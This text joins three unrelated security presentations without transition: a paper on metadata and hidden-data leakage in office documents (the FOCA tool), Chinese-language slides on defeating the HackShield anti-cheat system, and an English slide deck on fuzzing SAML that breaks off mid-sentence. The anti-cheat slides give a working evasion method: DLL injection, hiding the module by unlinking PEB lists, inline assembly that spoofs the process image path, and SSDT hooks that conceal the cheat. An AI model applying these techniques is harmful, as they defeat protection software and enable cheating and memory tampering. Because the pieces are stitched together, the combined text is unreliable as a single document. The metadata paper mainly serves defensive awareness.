lost data Page 7 of 29 Figure 12: Original thumbnail discover image’s manipulations 2.7 MODIFICATIONS One of the features offered by OpenOffice Writer is to track changes in documents. This is useful when a document is being developed by multiple users or when you want to log all the modifications. The submenu "modification" of the Edit menu can activate this feature, as well as make visible or hide the changes. A user can work on a document with this option activated, even by negligence, so that if the document is published without eliminating its history, anyone can guess if something has been removed or added, and by whom, and when these changes were made. Figure 13: Changes aren´t displayed Figure 14 shows that if you left the cursor on a change in the document for a few moments, there is a message indicating who made it and when. Disclosing Private Information from Metadata, hidden info and lost data Page 8 of 29 Figure 14: Changes are displayed All of this information about the change history is stored in the file content.xml: … <text:tracked-changes> <text:changed-region text:id="ct110732472"> <text:deletion> <office:change-info> <dc:creator>MiNombre MiApellido</dc:creator> <dc:date>2008-08-13T13:07:00</dc:date> </office:change-info> <text:p text:style-name="Standard">lamentablemente patética</text:p> </text:deletion> </text:changed-region> … 2.8 HIDDEN PARAGRAPHS Another option offered by OpenOffice is to hide text or paragraphs. This functionality allows working on a document in a display with hidden paragraphs, ready to print, and in another display, with all the paragraphs visible, for example, with the information for editing the document. This feature is activated including a special field in the paragraph: We can turn on or turn off the display of hidden text using the corresponding menu item "View". So, if we have a document with hidden paragraphs, but we do not have the option of seeing them, we are working with a display that does not show all the information that the document has. Figure 15 Document with hidden paragraphs Disclosing Private Information from Metadata, hidden info and lost data Page 9 of 29 Figure 16: Document displaying hidden paragraphs 2.9 HIDDEN INFORMATION DUE TO THE FORMAT Another type of hidden text or content is the one that is not visible due to the document format: for example, other content, such as an image, overlaps with it or the text is in the same color that the document background. Of course, this kind of content should be carefully reviewed before publishing the document. 2.10 NOTES, HEADERS, FOOTNOTES AND COMMENTS In an OpenOffice document there are a number of places where you can enter information that may go unnoticed in subsequent revisions. For example, in headers and footnotes, online annotations or comments, that can be entered using the "Notes" option in the "Insert" menu. These notes, unless you specify it, are not included when the document is printed or exported, for example, to PDF format, so it is easy to forget this information in the reviews. It has to be considered that some elements can be defined as "not printable"; therefore, a detailed revision of a document should not be limited to reading a printed version. Figure 17: Defining a document as printable or not printable (Spanish version, what a great language!) Disclosing Private Information from Metadata, hidden info and lost data Page 10 of 29 2.11 CUSTOMIZED METADATA Metadata, as it was discussed in the introduction of this document, are not harmful themselves, and on the contrary, they can be very useful for certain applications. In OpenOffice, the user is able to include customized Metadata in his/her documents and to add information to the document using the "Properties" option from the File menu. In addition to the customized Metadata, the document may store information if it is created from another previous document, inherited from this one. Figure 18: Customized metadata Sometimes, this customized information is used as a working tool in the process of document elaboration and may include corporate or personal opinions, more or less politically correct, identifications and other personal data or references to documentary sources. Of course, all this information must be reviewed before the document publication. 2.12 DATABASES The combination of documents with databases must be considered too. One of the most important functionalities provided by Office applications nowadays is the ability to generate models that, combined with databases, allow customized and automatic documents generation. These models, designed from mail merging, deserve a special consideration, since they contain information that allows describing the database they are taking the information from. All the information related to the database can be found in the settings.xml file. There is information about the name of the database and about the table used for the combination. <config:config-item config:name="CurrentDatabaseDataSource" config:type="string">Referencias</config:config-item> <config:config-item config:name="CurrentDatabaseCommandType" config:type="int">0</config:config- item> <config:config-item config:name="CurrentDatabaseCommand" config:type="string">Contactos</config:config-item> <config:config-item config:name="PrintDrawings" config:type="boolean">true</config:config-item> Figure 19: Information related to database in settings.xml Disclosing Private Information from Metadata, hidden info and lost data Page 11 of 29 And in content.xml file we can find the name of the database, the table and the fields: … <text:p text:style-name="Standard"> <text:database-display text:table-name="Contactos" text:table-type="table" text:column- name="nombre" text:database-name="Referencias"><nombre></text:database-display> </text:p> <text:p text:style-name="Standard"> <text:database-display text:table-name="Contactos" text:table-type="table" text:column- name="direccion" text:database-name="Referencias"><direccion></text:database-display> </text:p> <text:p text:style-name="Standard"> <text:database-display text:table-name="Contactos" text:table-type="table" text:column- name="clave" text:database-name="Referencias"><clave></text:database-display> … Figure 20: Information related to database in content.xml However, information regarding the connection to the database is not in the ODF document. This information could show the path to a database file or the credentials to access a server, and is stored in a user's profile file called DataAccess.xcu, that should be especially protected by the user. C:\Documents and Settings\USER_ACCOUNT\Program data\ \OpenOffice.org2\user\registry\data\org\openoffice\Office\DataAccess.xcu Although connection’s credentials to database are not published, the information stored with the document may be enough to help a potential attacker to prepare his attacks to the database, directly or through SQL Injection techniques on the company's website. 2.13 VERSIONS OF DOCUMENTS Like other Office packages, OpenOffice allows saving different versions of the same document. This feature is extremely useful in collaborative work environments, allowing the evaluation of the document changes and, if necessary, restoring the previous state after a mishandling. In the File menu, the "Versions" option is to save the current version of the document, and to save a new version of the document every time. Figure 21: Document’s versions (Software in Spanish) Disclosing Private Information from Metadata, hidden info and lost data Page 12 of 29 Within an ODF document that contains different versions we can find important information. First of all, a file called VersionList.xml with information about who saved each different version and when: <?xml version="1.0" encoding="UTF-8" ?> <VL:version-list xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:VL="http://openoffice.org/2001/versions-list"> <VL:version-entry VL:title="Version1" VL:comment="Versión guardada automáticamente" VL:creator="MiNombre MiApellido" dc:date-time="2008-08-13T00:39:22" /> <VL:version-entry VL:title="Version2" VL:comment="Versión guardada automáticamente" VL:creator="MiNombre MiApellido" dc:date-time="2008-08-13T00:41:53" /> … </VL:version-list> Figure 22: VersionList.xml Secondly, all the different versions of the document are stored in a folder called "Versions". For each of them, we can find the complete structure of a document in OpenOffice, ODF, that is, each version contains the files meta.xml, settings.xml, content.xml, etc... Figure 23: Versions folder 2.13 ANALYSIS AND CLEANING TOOLS There are some tools to analyze and remove Metadata in OpenOffice, such as 3BOpenDoc or 3BClean, but these tools only remove the file meta.xml, leaving the information about printers, possible internal servers and data connections to databases in the files settings.xml and content.xml. It is true that the meta.xml file is especially important because, as the documentation says, this file is not going to be encrypted even when you save the file as password protected, but in terms of security the rest of the Metadata is equal. Therefore it is very important to have a tool capable of analyzing all the information stored in these files and providing a convenient and user-friendly environment for all users in an organization to clean al the Metadata files in OpenOffice. OpenOffice itself offers the option to "Remove personal information when you leave," but this option does not remove the information from the operating system, printers, the version of the product, the path to the template. And we have seen that this information can show hidden routes or addresses from internal servers and of course, connection information to databases Disclosing Private Information from Metadata, hidden info and lost data Page 13 of 29 Figure 24: Delete all personal information when save the document (Software in Spanish) As a conclusion, the "Delete all personal information" option and the use of the available tools eliminate some metadata but not all the hidden information within an OpenOffice document. A last alternative is to use tools to recover damaged documents. Using the Recovery for Writer, for example, the information stored in the meta.xml and settings.xml files, disappears. However, the information about the structure of the database and the connection in the content.xml file does not disappear, and in documents created with templates, the look of the document may change. Therefore, it is not a definitive solution. Figure 25: Recovery for Writter 2.14 OOMETAEXTRACTOR As a better solution we conclude to develop a tool to extract and clean metadata and hidden info in OpenOffice documents. This tool is available under a Microsoft Public License in Codeplex web site. It has been developed in .Net so it needs .NET Framework and it has been tested only in Microsoft Windows operating systems. This tool allows users to analyze not only an ODF document but also a complete folder full of ODF documents in ODT, ODS or ODP formats. All metadata and hidden info are shown and can be exported in a text file. Moreover, this tool cleans all documents, even templates, links to documents, printer configuration and customized metadata. In order to create a company’s policy with metadata this tool has an option to set up a template for metadata. This means, what to do whit some kind of metadata. For instance, it would be desirable set up company’s name in company metadata, or a fixed author for all documents. Disclosing Private Information from Metadata, hidden info and lost data Page 14 of 29 This can be done easily with OOMetaExtractor. This tool is available for download along with its source code at http://www.codeplex.com/oometaextractor Figure 26: OOMetaExtractor (yes, it´s in Spanish) 3 METADATA AND HIDDEN INFORMATION INSIDE MICROSOFT OFFICE DOCUMENTS During the Microsoft Office installation, a dialog lets the user input information about him or her. From that moment on, the information the user provided will be added to each and every document created, or edited, by that user with this software. Figure 27: User Information in Microsoft Office 2003 In multi-user environments, the same product is often used by different users on the same computer. When a user runs an Office application for the first time, a new dialog appears asking for information about him or her. And, again, this information will be added to every document the user edits o creates. Disclosing Private Information from Metadata, hidden info and lost data Page 15 of 29 Figure 27: Another User stars Microsoft Office 2003 And this information can pose a risk, above all because the default value for the “Name” field is the user account name. 3.1 DOCUMENT PROPERTIES Upon document creation, authors can explicitly assign metadata to it, that is, creator can introduce a short description, keywords, and their department o whatever that may be suitable or useful. This data gets stored indefinitely inside the document file. When a document containing metadata is used as a template in order to create new documents, these ones will inherit this information. Document metadata is customizable, so they may contain any attribute and value the author could add. This must be kept into account when publishing documents created in corporative environments, because an inappropriate metadata can damage the organization image. Figure 28: Document´s properties (all in Spanish….) Disclosing Private Information from Metadata, hidden info and lost data Page 16 of 29 3.2 EMBEDDED FILES Microsoft Office allows users to embed images and other documents into the documents they create. These embedded documents may contain their own metadata, thus being a potential source for information leaks. The next example shown an image file created with GIMP, a graphic document creation program. That image contains EXIF information, readable with any EXIF extraction tool. It may be seen that the image has a metadata attribute showing the program used. It also has a thumbnail for the image inside the same file. Figure 29: EXIF Metadata in an embedded image Let’s embed this image inside a Microsoft Word 97 document, using the “Insert Image” option from the “File” menu. Then, using a hexadecimal editor, the image metadata can be read. 3.3 EXTRACTING EMBEDDED FILES It is easy to extract these embedded files from Microsoft Word DOC, Excel XLS or PowerPoint PPT files. Just by saving the document in HTML (web page) format, these programs extract embedded files and store them as independent files. Figure 30: Extracting embedded files Disclosing Private Information from Metadata, hidden info and lost data Page 17 of 29 It can be seen that EXIF information has not been modified. In this example, the thumbnail looks different from the image, showing that some editing work has been made on it. This metadata preserving behavior can be found in Microsoft Office versions. They don’t modify EXIF information unless the author uses the “Modify Image” option and then, saves the document. Microsoft Office 2007 introduces a new file format, called OOXML which will become to ISO DIS 29500 in next Microsoft Office versions. DOCX, XLSX, and PPTX files are ZIP compressed archives in which embedded files are stored as independent items. These items can also be easily extracted. Figure 31: Files inside an OOXML file 3.4 REVISIONS Y MODIFICATIONS Users involved in document sharing and workflows find Microsoft Office “Revision” feature especially useful. This feature allows more than one user to work on the same document, while keeping track of who made each change, so that previous document states can be recovered. But when the document is made available to the public, this data is no longer useful and can turn into compromising information. Figure 32: Changes can be seen (Image in Spanish) As the image shows, older contents are shown in red color. Final document view gives a positive result, while the older one gave a negative one. This could be seen by any user, only by selecting the “see original document”. Disclosing Private Information from Metadata, hidden info and lost data Page 18 of 29 3.5 NOTES, HEADERS AND PAGE FOOTINGS There are other places where non intended information may appear, such as notes and page headers and footers, or presentation annotations. They can contain reference codes used inside the organization, names of users that worked on the document or file paths. All this information must be taken into account before the document is published. 3.6 ELEMENTS HIDDEN BY THEIR FORMAT In a Microsoft Office document, an image can be hidden by other ones above it. Template elements may contain undesired data that afterwards can be hidden by document text or images. Some text can be of the same color than the background. All these items are not visible, but they remain within the document and therefore can be use to extract information. Errors and negligent or malicious behaviors may cause this kind of data be part of the documents the organization publishes or send out. Figure 33: Data hidden by document’s format 3.7 OTHER PLACES WHERE TO LOOK FOR DATA The list of places where undesired data may appear is very long: comments, style sheets, hyperlinks to Intranet servers, or even parameters or variable names in VBScript macros… All this data can be easily retrieved using a hexadecimal editor or a string extraction program. Figure 34: Strings extracted from an OOXML file using bintext Disclosing Private Information from Metadata, hidden info and lost data Page 19 of 29 3.8 HIDDEN METADATA So far, this part about Microsoft Office has dealt with metadata and information easily accessible, and sometimes editable, by the user. But there is another kind of data that is stored inside documents and is not available to the user. These metadata are used by Microsoft Office in order to perform its own tasks. And they may contain compromising information such as software versions, authors, revision history, the last person who edited it and when he did it, the last time the document was printed, which printer was used, total editing time for the document, information about e-mail messages including e- mail addresses, and even, in some earlier versions of Office, a Global Unique ID that identifies the computer on which the document was edited. Figure 35: Extracted document’s metadata using Libextractor 3.9 DATABASE CONNECTIONS Information stored in a particular file depends on the Microsoft Office version used and the file format. Sometimes, if document is using an external source to be constructed even information about databases and ODBC drivers can be retrieved. The following image shows a SELECT query, configured ODBC drivers, the database server, database itself and the password too. Figure 36: Database info Disclosing Private Information from Metadata, hidden info and lost data Page 20 of 29 Putting it in clear text in figure 36, we have: SELECT pruebas_0.apellidos, pruebas_0.nombre, pruebas_0.tlf FROM pruebasmetadata.pruebas pruebas_0 DATABASE=pruebasmetadata DRIVER={MySQL ODBC 3.51 Driver} OPTION=0 PWD=PassMETADATA PORT=0 SERVER=servidor UID=UsuarioMETADATA A hexadecimal editor is, again, all it takes to read this data from a document. As can be seen, this is a special document created to generate documents changing some special parts which are coming from a database repository. 3.10 PRINTERS As it was seen before, revision history provides information about user accounts and paths that may relate to server names and shared resources. Another compromising hidden piece of information that can be found inside documents is printer data. Figure 37: Information about printer As in ODF documents, sensitivity of this information depends on the way printer had been configured. When the printer is shared on a server, it can appear in UNC format, thus providing a server name and a shared resource and even the server’s IP address, revealing the way the internal network has been addressed. Although this is quite important by itself it is giving more information to a potential attacker just because if document´s creator is using that printer then it means that user has access to that resource so, of course, that user is a valid one in server’s. Hence, at the end, it´s also possible to discover information about network’s ACLs. Disclosing Private Information from Metadata, hidden info and lost data Page 21 of 29 Figure 38: Printer in UNC format Microsoft Office versions prior to Office 97 seldom include this information into document metadata. But all versions do update it if they find it, changing its value to the name of the printer currently in use, even if the document is not printed: a simple edition and saving is all it takes. Hence, documents which have been used by the organization since those old Office 97 times must be carefully inspected for printer data. 3.11 DOCUMENT ANALYSIS AND CLEANING Cleaning Microsoft Office documents before sending or publishing them is a must, since they may contain huge amounts of undesired data. The ultimate tool for accomplishing this task is the “Inspect Document” option available in Office 2007. It searches for all metadata and hidden information, including printer data or revision history, and gives the user the option to remove it all from the document. No matter what version of Microsoft Office was used no create and edit the document, “Inspect Document” will clean it with only a few clicks. Figure 39: Preparing document in Microsoft Office 2007 (yes, it´s Spanish) Disclosing Private Information from Metadata, hidden info and lost data Page 22 of 29 Previous versions of Microsoft Office didn’t provide this option. For that reason, Microsoft released a plug-in to improve software with cleaning options. This tool is known as RHDTool and it´s available for downloading in the following URL: http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=144e54ed-d43e- 42ca-bc7b-5446d34e5360 Figure 40: RHDTool Also, Microsoft has published some guides to help users to minimize the amount of metadata in their documents (their URLs are in the References section of this paper). Another option is using third party tools, like Metadata Extractor o Doc Scrubble. It must be said, anyway, that from the tests made it can be deduced that sometimes these tools don’t clean all metadata and hidden information. For example, the following image shows DocScrubble options, and, for instance, although a document was cleaned using DocScrubble, it keeps containing printer data. Figure 41: Printer info remains inside the file Disclosing Private Information from Metadata, hidden info and lost data Page 23 of 29 It has been said that converting Microsoft Office to other formats may be a solution to the problems stated in this article, in particular, converting them to PDF format. But PDF files store information too, both in the “Data Dictionary” and in XMP streams. These metadata may include user accounts, file paths, URLs pointing to Intranet servers, e-mail message headers including e-mail addresses, information about the Operating System and more. Figure 42: PDF Metadata including Intranet references But even converting documents to TXT format may not be enough, even if they contain no metadata at all. When a document is published in the corporate web, it becomes available to web search engines, as Google, MSN Search or Yahoo. And this search engines create new metadata about them: they give them a title, provide an abstract of their content as part of the results and store a cached version. As that search engine generated metadata is created based upon the document content, any lost data that the document contains may turn into metadata. 4 METADATA EXTRACTION TOOLS There are several tools to retrieve metadata from documents, depending on their format. Maybe, libextractor is the best known of them all. It features a library of functions to access document’s properties and a standalone program, called “extract” which parses and extracts metadata from several file formats, including Microsoft Office documents, ODT, PDF and many more. The support for Microsoft Word DOC files includes extraction of the revision history, being one of the few tools freely available to accomplish this task. Metagoofil is a program that downloads documents from web sites and afterwards extracts metadata from them using extract tool, making the process of fingerprinting corporate networks easier. Exiftool is another open source metadata extraction tool. Originally designed to extract EXIF information from image files, it can process a huge amount of file formats, including again Microsoft Office Documents. When present, it can retrieve GUID information from old versions Microsoft Word files. Another remarkable feature of Exiftool is the way it deals with PDF documents, being able to extract both Data Dictionary and XMP metadata. It has an option that allows in deep scanning for XMP metadata even if it has been disassociated from the PDF file main tree structure. Both extract and exiftool are command line utilities. Disclosing Private Information from Metadata, hidden info and lost data Page 24 of 29 There are tools to extract metadata through a GUI, like ExifReader. Anyway, this kind of programs tends to be less flexible and powerful than their command line alternatives. But all these programs deal mostly with metadata and don’t pay much attention to hidden information, with the exception of extract and its revision history processing. Neither printer information, templates paths, nor database information can be obtained by them. To solve this problem, new tools have to be made. And that’s why the FOCA tool was created. FOCA uses web search engines to locate documents, download them and extracts metadata and hidden information from them. It can retrieve information from several file formats, including Microsoft Office documents, ODF, Word Perfect files and more, and the range of information obtained is wider that the one achieved with any other tool mentioned here. 5 SEARCH ENGINES When a document is published in the corporate web, it becomes available to web search engines, such as Google, Live Search or Yahoo. These search engines create new metadata about them: they give them a title, provide an abstract of their content as part of the results and store a cached version. As that search-engine-generated metadata is created based upon document’s content, any lost data document contains may turn into metadata. That is even worse if document does not contain title or customized metadata helping search engines to create a short description of it. With a little Google Hacking work, addressing metadata fields as the “title” through using searching options as “intitle”, compromising information can be retrieved. There is no need for even downloading documents hence organizations may not even notice someone is accessing sensitive data. Figure 43: Fbi.gov users gathered by Google Disclosing Private Information from Metadata, hidden info and lost data Page 25 of 29 Of course, this kind of data can be found in documents created or edited on Linux, and all Unix flavors, systems too: Figure 44: *NIX users All this information becomes available to anyone who has Internet access. And it may remain available even after documents were modified or removed from web site due to the cache feature most web search engines provide. Cached copies from documents may appear tagged with the words “Cache” or “HTML version”, and they are stored by the search engine systems themselves, thus giving little control to website owners and administrators on their contents and access rights. Of course, search engines companies provide tools which allow webmasters to remove contents from their indexes, but those tools may be useless for massive document management. Besides, monitoring accesses through search engine caches is, at least, a taught task for organizations and website administrators. 6. FOCA Just as a proof of concept, FOCA is been developed. FOCA, which stands for “Fingerprinting Organization with Collected Archives” is an automated tool for downloading documents published in websites, extracting metadata and analyzing data. Now it´s an on growth project which is being improved day by day. FOCA searches for links to documents using Google and Microsoft Live Search engines. This tool is not using any special Google key to access the API, so if Google or Microsoft Live asks for a CAPTHA value then FOCA will stop and show up the CAPTCAH, waiting for it to continue. Disclosing Private Information from Metadata, hidden info and lost data Page 26 of 29 Figure 45: 1394 office documents published in Blackhat web site A big website can store between three and five thousand Office documents so, in a normal search for links maybe between zero and five CAPTCHAs can be required (depending on the Google and Microsoft security policies in that moment). After collecting all the links, all documents can be downloaded using a multi thread engine to retrieve all of them as fastest as possible. Figure 46: FOCA downloading files Disclosing Private Information from Metadata, hidden info and lost data Page 27 of 29 Once retrieved, FOCA allows extracting metadata from all documents. Today FOCA supports DOC, XLS, PPT, PPS, DOCX, PPTX, PPSX, XLSX, SWX, ODT, ODS, ODP, PDF, and WPD documents. In the following image the metadata extracted from a public document is shown. In this case, the document is a (great) David Litchfiled work. Figure 47: Metadata stored in a Microsoft Doc published at Blackhat.com (in English) Once all documents are analyzed FOCA will collect three special lists. First one with discovered users, second one with paths to files and the last one with printers. Besides, using FOCA is easy to track where the metadata is stored in order to analyze deeply a real environment. Figure 48: Tracking Metadata in files Disclosing Private Information from Metadata, hidden info and lost data Page 28 of 29 FOCA will also search for new servers in the domain name server using Google Sets and Wikipedia categories based in the server names found and at the end, a view more or less complete depending in the amount of data obtained will be printed. There is an on-line version of FOCA which can be used by anyone in the following URL: http://www.informatica64.com/FOCA. Figure 49: FOCA, on-line version 7 SECURE WEB PUBLISHING Removing metadata from documents is not an easy task. As far as users can not be relied on to ensure document security and the volume of published information increases faster and faster, organizations must find ways to make it automatically. Among the systems involved in document security, web servers play a fundamental role, as they are the logical boundary between Internet and the organization. MetaShield Protector is a solution for sanitizing documents on the fly as they are served to users by IIS web servers. It replaces document metadata so that they contribute to security and offer a normalized public image of the organization. CONCLUSIONS Any document can have associated metadata that contain lost information or hidden data. In particular, Microsoft Office and OpenOffice documents may contain data about the internal network, its user accounts and machines, shared resources, services provided, operating systems, and more. Organizations must take this information into account before publishing documents on the web or sending them by e-mail. Cleaning these documents is a must, as it is taking care of how web search engines index them. Keep an eye in the information you know you published and the one you maybe publish without knowing it. Disclosing Private Information from Metadata, hidden info and lost data Page 29 of 29 REFERENCES EXIF [Exchangeable Image File Format] http://en.wikipedia.org/wiki/Exif IPTC [International Press Telecommunications Council] http://en.wikipedia.org/wiki/IPTC XMP [Extensible Metadata Platform] http://en.wikipedia.org/wiki/Extensible_Metadata_Platform WD97: Cómo minimizar metadatos en documento de Microsoft Word http://support.microsoft.com/kb/223790 Cómo minimizar metadatos en documentos de Microsoft Word 2000 http://support.microsoft.com/kb/237361 How to minimize metadata in Word 2002 http://support.microsoft.com/default.aspx?scid=kb;EN-US;290945 Cómo minimizar metadatos en Word 2003 http://support.microsoft.com/kb/825576/ How to minimize metadata in Microsoft Excel workbooks http://support.microsoft.com/default.aspx?scid=kb;EN-US;223789 Ppt97: Cómo minimizar metadatos en presentaciones de Microsoft PowerPoint http://support.microsoft.com/kb/223793/ PPT2000: How to Minimize Metadata in Microsoft PowerPoint Presentations http://support.microsoft.com/default.aspx?scid=kb;EN-US;314797 How to minimize the amount of metadata in PowerPoint 2002 presentations http://support.microsoft.com/kb/314800/EN-US/ Microsoft Word bytes Tony Blair in the butt http://www.computerbytesman.com/privacy/blair.htm Word list generation for bruteforce cracking http://www.reversing.org/node/view/9 Utilidades ExifReader http://www.takenet.or.jp/~ryuuji/minisoft/exifread/english/ Wlgen http://www.reversing.org/node/view/8 OOMetaExtractor http://www.codeplex.com/oometaextractor DocScrubber http://www.javacoolsoftware.com/docscrubber/index.html Metadata Extraction Tool http://www.drewnoakes.com/code/exif/releases/ Libextractor http://gnunet.org/libextractor/ Bintext http://www.foundstone.com/us/resources/proddesc/bintext.htm Metagoofil http://www.edge-security.com/metagoofil.php Foca Online http://www.informatica64.com/foca
大可(Dark)  熟悉的語言:C/C++ , PASCAL , ASM  專長:windows 程式設計&逆向工程  講課經驗:在ZCamp2008講過課  興趣:程式設計&資訊安全&美食&聊天&動漫& 睡覺&看電影&聽音樂&彈鋼琴&打電玩  Hackshield是一款防止外掛程式的入侵的軟件, 執行遊戲時,Hackshield會偵防外掛使用者的 電腦, 並封鎖不正常的程式碼, 有效防止按鍵 精靈、加速器等的外掛的運行。  轉自  http://eco.gamecyber.com.tw/tw/hanckshield01.html  CE (Cheat Engine)  讀寫記憶體  按照使用者指定的方式去比對記憶體的資料  有開放原始碼  UCE(Undetected Cheat Engine)  防外掛軟體會封鎖CE  有人改CE原始碼,改成防外掛檢測不到  不需要再去找Bypass HS(hackshield)版的UCE  也不用自己修改CE原始碼  可以寫一個程式 , 使”任何工具”繞過HS  其實這部分很容易, 前提是要知道如何繞過HS  可以把繞過HS的方法,寫成DLL  然後把DLL inject到指定的外掛工具中 可以歸納為"攻" 與 "守" 兩個動作  目的:偵測對遊戲不利的程式  inline hook SSDT- NtDeviceIoControlFile:  攔截分析: 由於CE(Cheat Engine)從driver呼叫 CE內 部的OpenProcess方式,所以Usermode 必須呼叫 DeviceIoControl 跟 driver交換訊息。  不定期取得process的資訊。  enum window尋找可疑的視窗。 • 目的:讓遊戲記憶體不被外部程式Access,並防止HS遭修改 • Inline hook SSDT- NtOpenProcess – 防止被外部程式獲得Process Handle, – 然而工作管理員卻是白名單(可以給我們利用) • Hook shadow SSDT-NtUserSendInput – 防止模擬鍵盤滑鼠輸入 • 此外會不定期對遊戲的code segment做CRC check – 防止遊戲程式碼被修改!  Inline hook SSDT– NtReadVirtualMemory  防止遊戲記憶體被讀取  Inline hook SSDT– NtWriteVirtualMemory  防止遊戲記憶體被寫入  外掛也可以分為攻與守兩個方式  攻:繞過,防護對遊戲記憶體做讀寫  守:防止工具被HS檢驗到  上面兩點都達到大概就圓滿落幕了  Hook NtLoadDriver  這樣就能使HS的驅動不正常運作 但是  防外掛不只包含那個驅動, 有其他模組會檢查HS 驅動執行是否正常  不正常就關閉遊戲  追蹤 HS載入的地方  修改程式,完全拔掉 HS  可以完全拔掉... 但是  遊戲會發"確認HS運作正常"的封包  如果破壞 hackshield 的完整性  要進行繁瑣的修復動作  分析伺服器送出的確認封包  模仿加密過程送出  才能讓遊戲正常執行  So , 選擇與hackshield共存  透過hook , 來載入我們的dll  防止 HS對Executable Module list做驗證  dll injection成功之後,把dll module給隱藏  就能直接存取遊戲的記憶體空間  別用ReadProcessMemory 或 WriteProcessMemory讀寫記憶體  遊戲有對這兩個API做Inline SSDT Hook  找到PEB(Process Environment Block)  在fs[0x30]可以找到peb ,像這樣” mov eax , fs: [0x30]”  到PEB->Ldr, 去enum下面三個module的List_Entry 結構  InLoadOrderModuleList  InMemoryOrderModuleList  InInitializationOrderModuleList  比對module,把要隱藏的module連結弄斷  Current->Blink->Flink=Current->Flink  Current->Flink->Blink=Current->Blink  指定的dll module就會被孤立 • 開工作管理員可以結束掉遊戲的process – 可見工作管理員能對遊戲做OpenProcess的動作 – 工作管理員(taskmgr.exe)在HS的白名單裡面 • 從 PEB 到 _RTL_USER_PROCESS_PARAMETERS 結構, 改掉ImagePathName來偽裝 void Fake_Fake_FakeXD (WCHAR* wszImagePathName) { _asm { mov eax,fs:[0x30] //eax points to PEB mov eax,[eax+0x010] //eax points to _RTL_USER_PROCESS_PARAMETERS add eax,0x38 //eax points to ImagePathName(UNICODE_STRING) add eax,0x4 //UNICODE_STRING.Buffer mov ebx,wszImagePathName mov [eax],ebx } }  HS針對 NtOpenProcess 弄了一個inline hook, 偵測這個hook是否有效  無效的話就BSOD。  先不要動NtOpenProcess,他們忘記了 NtOpenProcess上面的老大  ObOpenObjectByPointer  利用這來獲得Process Handle 利用 KeAttachProcess 這個Native API 弄個Read&WriteProcessMemoryByPid 如此就不用煩惱取得Process Handle的種種問題!  hook shadow SSDT , 把獲得視窗Handle的函數 hook掉  例如  NtUserQueryWindow  NtUserGetForegroundWindow  NtUserWindowFromPoint  NtUserFindWindowEx  NtUserBuildHwndList 防止外掛的Process Handle被HS拿去用 防止HS從Process List獲得我們外掛的一些資訊 Afert 要保護遊戲是件不容易的事情  DKOM(Direct Kernel Object Manipulation)  http://www.blackhat.com/presentations/win-usa-04/bh-win-04-butler.pdf  HOWTO: Implement your own NtOpenProcess in kernel-mode  http://wj32.wordpress.com/2009/02/19/howto-implement-your-own- ntopenprocess-in-kernel-mode/  Undocument-PEB Structure  http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/ NT%20Objects/Process/PEB.html  简单说说SSDT  http://icylife.net/yunshu/show.php?id=435  NEXON采用的新反作弊软件--Hack Shield Pro 介绍  http://qbar.games.qq.com/popkart/165052.htm?owner=66191052  Cheat Engine  http://www.cheatengine.org/ Email: cl4rk.z3r0@gmail.com Blog: http://cl4rk.pixnet.net/blog/ ANY Question?
COPYRIGHT ©2006 McAfee Inc. » Fuzzing XML Based Protocols (SAML) Hacks-In-Taiwan 2006 Yen-Ming Chen Senior Principal Consultant Foundstone, A Division of McAfee 2 COPYRIGHT ©2006 McAfee Inc. Agenda » Introduction – SAML – OpenSAML » Scenarios » Implementation » Conclusion 3 COPYRIGHT ©2006 McAfee Inc. SAML » Security Assertion Markup Language (SAML) » Codified by OASIS with participation from MACE and others » Defines XML Schema for AuthN and attribute assertions, queries, responses, and use profiles such as Web SSO. » Defines bindings to protocols for transport » V2.0 expands SAML and includes definitions from Shibboleth and the Liberty Alliance 4 COPYRIGHT ©2006 McAfee Inc. SAML in a Nutshell » An XML-based framework for exchanging security information – XML-encoded security assertions – XML-encoded request/response protocol – Rules on using assertions with standard transport and messaging frameworks » An OASIS standard (1.0, 1.1, and 2.0) – Vendors and users involved – OpenSAML implementation available – Codifies current system outputs vs. creating new technology 5 COPYRIGHT ©2006 McAfee Inc. OpenSAML » OpenSAML for the message and assertion formats, and protocol bindings which is based on Security Assertion Markup Language (SAML) » SAML (Security Assertion Markup Language) is a standard for the formation and exchange of authentication, attribute, and authorization data as XML. It describes various kinds of messages and standard ways of transporting them. » OpenSAML is a set of open-source libraries in Java and C++ which can be used to build, transport, and parse SAML messages. 6 COPYRIGHT ©2006 McAfee Inc. Technology » Basic concepts – Subject/principal • User or application requesting access to a resource – Assertion • Set of statements about a subject – Authority • Entity that produces and/or consumes assertions – Binding • Specification for transporting assertions as protocol payloads – Profile • Specification describing rules for embedding, transferring, extracting, and processing assertions 7 COPYRIGHT ©2006 McAfee Inc. Technology » Use cases – Web single sign-on (SSO) • User logs onto source site and implicitly requests brokered logon to one or more destination sites with pre-existing trust relationships to source site – Authorization • Once having logged onto trusted destinations via SSO, user requests authorized access to various resources controlled by destinations – Back-office transactions • User attaches assertions to electronic business document and transmits to relying party 8 COPYRIGHT ©2006 McAfee Inc. SSO use case Authenticate Web User Source Web Site Use Secured Resource Destination Web Site 9 COPYRIGHT ©2006 McAfee Inc. Assertion Statement Authentication Statement Attribute Statement Authorization Decision Statement --Identifier --Issuer --Issuance timestamp --Conditions --Advice Assertion Title Syntax 10 COPYRIGHT ©2006 McAfee Inc. SAML assertion SAML requester SAML responder within SAML-enabled authentication authority, attribute authority, PDP, or PEP SAML request message specifying assertion type to be returned* SAML response message containing assertion of type specified* within SAML-enabled authentication authority, attribute authority, PDP, or PEP *optionally, SAML messages may be digitally signed via XML Signatures, or sent over secure Transport Layer Security (TLS) channels Message Exchange Protocol 11 COPYRIGHT ©2006 McAfee Inc. SOAP message SOAP header SOAP body SAML message SAML assertion Binding with SOAP 12 COPYRIGHT ©2006 McAfee Inc. SAML assertions » An assertion is a declaration of fact about a subject, e.g. a user – (according to some assertion issuer) » SAML has three kinds, all related to security: – Authentication – Attribute – Authorization decision » You can extend SAML to make your own kinds of assertions » Assertions can be digitally signed 13 COPYRIGHT ©2006 McAfee Inc. All assertions have some common information » Issuer and issuance timestamp » Assertion ID » Subject – Name plus the security domain – Optional subject confirmation, e.g. public key » “Conditions” under which assertion is valid – SAML clients must reject assertions containing unsupported conditions – Special kind of condition: assertion validity period » Additional “advice” – E.g., to explain how the assertion was made 14 COPYRIGHT ©2006 McAfee Inc. Authentication assertion » An issuing authority asserts that: – subject S – was authenticated by means M – at time T » Caution: Actually checking or revoking of credentials is not in scope for SAML! – Password exchange – Challenge-response – Etc. » It merely lets you link back to acts of authentication that 